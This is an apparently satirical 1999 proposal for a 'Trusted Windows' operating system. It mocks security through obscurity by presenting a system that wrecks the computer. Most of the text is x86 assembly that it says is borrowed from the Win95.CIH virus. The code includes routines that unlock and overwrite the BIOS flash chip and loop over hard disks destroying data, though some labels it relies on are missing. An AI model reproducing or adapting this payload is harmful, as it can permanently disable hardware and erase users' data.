Description of a Proposed Trusted Operating System by Wyzewun and Pneuma Drawn up Tuesday, 31st August 1999 Abstract: Trusted Windows (Code Name: Gibson) will be based on the popular Microsoft Windows Operating System, and will essentially be the same Operating System, only it will have military grade security. Proposed Liscence Agreement: If we were to be Open source, people would see that we code like two year olds, and thus perhaps be able to spot flaws in our code. For this reason we will not be Open Source. Also, rather than making our Operating System a retail product, we will make it completely illegal to use or possess. This will increase security and lessen chances of people finding bugs and loopholes. Details: The Operating System will be small and elegant, and has had all of the security holes in Windows removed. At the moment, the Operating System consists of the following code... ; Trusted Windows v1.0 (Code Name: Gibson) by Wyzewun and Marc Satur9 ; Super Hardcore secure Windows variant ; Kill BIOS EEPROM mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; Show BIOS Page in 000E0000 - 000EFFFF (64kb) mov edi, 8000384ch mov dx, 0cfeh cli call esi ; Show BIOS Page in 000F0000 - 000FFFFF (64kb) mov di, 0058h dec edx mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; Show the BIOS Extra ROM Data in Memory (000E0000 - 000E01FF) (512 bytes) ; The Section of Extra BIOS can be Writted... lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; Kill the BIOS Extra ROM Data in Memory (000E0000 - 000E007F) (80h Bytes) xor ah, ah mov [eax], al xchg ecx, eax loop $ ; Show and Enable the BIOS Main ROM Data (000E0000 - 000FFFFF) (128kb) ; Can be written mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; Kill the BIOS Main ROM Data in Memory (000FE000 - 000FE07F) (80h bytes) mov ah, 0e0h mov [eax], al ; Hide BIOS Page in 000F0000 - 000FFFFF (64kb) mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; Kill HardDrive KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk As you can see, this code was borrowed from the extremely popular addon pack for Microsoft Windows - the Win95.CIH Virus. It succeeds in removing the BIOS and the ability of the hard-drive to boot, two of the most common ways to access your Windows workstation and thus be able to hack it. Conclusion: Well, this is a revolutionary step in the field of Computer Security which the world may not be ready for, but we are confident that Trusted Windows is the only way to have a truly secure Windows box and highly recommend that you employ it if you wish to be secure. Only you can't have it. Giving it to you would be a security threat. Sorry.